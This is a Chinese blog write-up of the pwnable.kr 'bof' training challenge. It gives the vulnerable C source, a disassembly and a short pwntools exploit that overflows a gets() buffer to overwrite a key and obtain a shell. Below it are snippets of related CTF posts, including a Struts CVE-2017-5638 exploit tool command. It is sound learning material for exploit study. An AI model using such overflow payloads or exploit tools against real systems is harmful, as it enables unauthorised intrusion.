PWN学习之[Toddler''s Bottle]-[bof]

最新推荐文章于 2021-02-04 23:17:50 发布
最新推荐文章于 2021-02-04 23:17:50 发布
阅读量544 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Magic1an/article/details/77418324
本文详细介绍了通过分析bof.c程序中的函数调用和汇编代码,如何利用gets函数导致的缓冲区溢出来改变key的值,从而在key等于0xcafebabe时获取shell的过程。通过填充特定长度的数据并加上目标值,成功执行exp获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

将bof和bof.c文件下载下来 

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

通过bof.c可以看到当key==0xcafebabe时获得shell,但是由于func函数传入的实参为0xdeadbeef,看起来不可能实现get shell

但是我们注意到func函数通过gets函数获取overflowme的值,这就给了我们溢出的基础,通过溢出overflowme覆盖key的值从而使的key==0xcafebabe。

查看func的汇编代码

 0x0000062c <+0>:   push   ebp
   0x0000062d <+1>: mov    ebp,esp
   0x0000062f <+3>: sub    esp,0x48
   0x00000632 <+6>: mov    eax,gs:0x14
   0x00000638 <+12>:    mov    DWORD PTR [ebp-0xc],eax
   0x0000063b <+15>:    xor    eax,eax
   0x0000063d <+17>:    mov    DWORD PTR [esp],0x78c
   0x00000644 <+24>:    call   0x645 <func+25>
   0x00000649 <+29>:    lea    eax,[ebp-0x2c]  //[ebp-0x2c]为overflowme
   0x0000064c <+32>:    mov    DWORD PTR [esp],eax
   0x0000064f <+35>:    call   0x650 <func+36>
   0x00000654 <+40>:    cmp    DWORD PTR [ebp+0x8],0xcafebabe   //[ebp+0x8]为key
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    mov    DWORD PTR [esp],0x79b
   0x00000664 <+56>:    call   0x665 <func+57>
   0x00000669 <+61>:    jmp    0x677 <func+75>
   0x0000066b <+63>:    mov    DWORD PTR [esp],0x7a3
   0x00000672 <+70>:    call   0x673 <func+71>
   0x00000677 <+75>:    mov    eax,DWORD PTR [ebp-0xc]
   0x0000067a <+78>:    xor    eax,DWORD PTR gs:0x14
   0x00000681 <+85>:    je     0x688 <func+92>
   0x00000683 <+87>:    call   0x684 <func+88>
   0x00000688 <+92>:    leave  
   0x00000689 <+93>:    ret

通过汇编代码我们可以看到,[ebp-0x2c]即为overflowme,[ebp+0x8]为key。所以我们只需要填充52个字节再加上0xcafebabe即可获得shell。

因此我们的exp为

from pwn import *
payload='a'*52+p32(0xcafebabe)
#p=process("./bof")
p=remote('pwnable.kr',9000)
p.recvline()
p.recvuntil("\n")
p.sendline(payload)
p.interactive()

再执行cat flag命令即可获取flag了。

最后附上文件方便实践:链接

pwn学习pwnable.kr bof
Richard_pl的博客
03-12 547
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
最新发布
qq_66013948的博客
03-05 1571
​ 格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
[Toddler's Bottle]-[bof]
ACdream
05-04 812
linux下的所谓的简单的缓冲区溢出的题 这是题目链接中给的bof.c源代码 #include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe)
pwnable 笔记 Toddler's Bottle - bof
HiTaQini
11-16 1999
缓存区溢出
PWN-bof
MuMuLee_的博客
08-26 619
题目给出一个PWN文件和两个netcat端口 解题步骤 1、ubuntu ->下载PWN文件,找到文件所在位置打开终端-> file命令 看到是一个32位的ELF文件 2、回win10 ,分析漏洞类型 把pwn文件拖进32位的ida 查看main函数的反汇编代码 sub_8048573 用到read函数,看一下汇编代码 3、解题方法 构造payload=‘a’*个数+返回地址...
pwnbof
jxz_dz的博客
11-04 1137
有一两周没更新了,坚持... 接着前边继续第三篇bof. 这次让我们直接下载bof.c,以及bof文件.分析代码和文件,然后在pwnable.kr 9000执行,获取flag 1.先看下bof.c的代码: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(i...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.youkuaiyun.com/A951860555/article/details/110350773
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 574
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
PWN学习003 bof
05-10 199
先看程序 下载相应代码和程序。 查看源码。 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key) { char overflowme[32]; printf("overflow me...
[Toddler's Bottle]-[fd]
ACdream
04-22 574
很简单的学习linux的好玩的东西
NTUSTISC(台科大資訊安全研究社)pwn bof
carol2358的博客
04-03 871
题目来自:https://isc.taiwan-te.ch/scoreboard/ 记录一下pwnbof, 初始pwn题 栈溢出,覆盖返回地址就可以 根据function prologue: push rbp mov rbp, rsp sub rsp, 0x10 得出偏移地址0x18 用 objdump -d bof 得出跳转位置 0x0000000000400607 然后写exp:...
pwnable之bof
qq_43430261的博客
10-18 435
看代码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafeb...
pwn学习3 bof
飞花的世界
12-28 711
那我就首先下载代码。。。 #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(k...
SniperOJ pwn100-bof writeup
0_Re5et
04-27 2557
在大佬的指导下拿到了人生中第一个pwn flag。感觉pwn真的帅的飞天了!在此简单记录一下思路。因为还没有补相关的基础知识,哪里不对的话还请各位大佬指出~比心~1. 首先查看文件版本命令 file filename 可以看到程序是64bit,linux平台下的 在这里补充一下查看本机操作系统位数的命令: getconf LONG-BIT 然后就去对应的系统下就ok了2. 查看源代码或运
Pwnable】[Toddler's Bottle]--bof
VZZmieshenquan的博客
02-15 201
Description: Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at :...
PWN学习之[Toddler''s Bottle]-[passcode]
Magic1an的博客
08-19 562
打开passcode.c,可以看到源码如下:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha!
乱七八糟的pwn入门(四)——3.bof
Z_Pathon的博客
08-14 447
审题 先来看题目: 终于要用到我最感兴趣的栈溢出啦,赶紧把两个文件都下下来,先来看C语言文件: 看了这段代码就知道要干嘛了,目标就是利用gets函数的漏洞,通过栈溢出把传入的key值覆盖,来进入系统的shell。 然后把可执行文件用IDA打开,这就要用到汇编知识了,首先查看main函数: 由main函数可见,在参数传递后,跳转到了fun...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值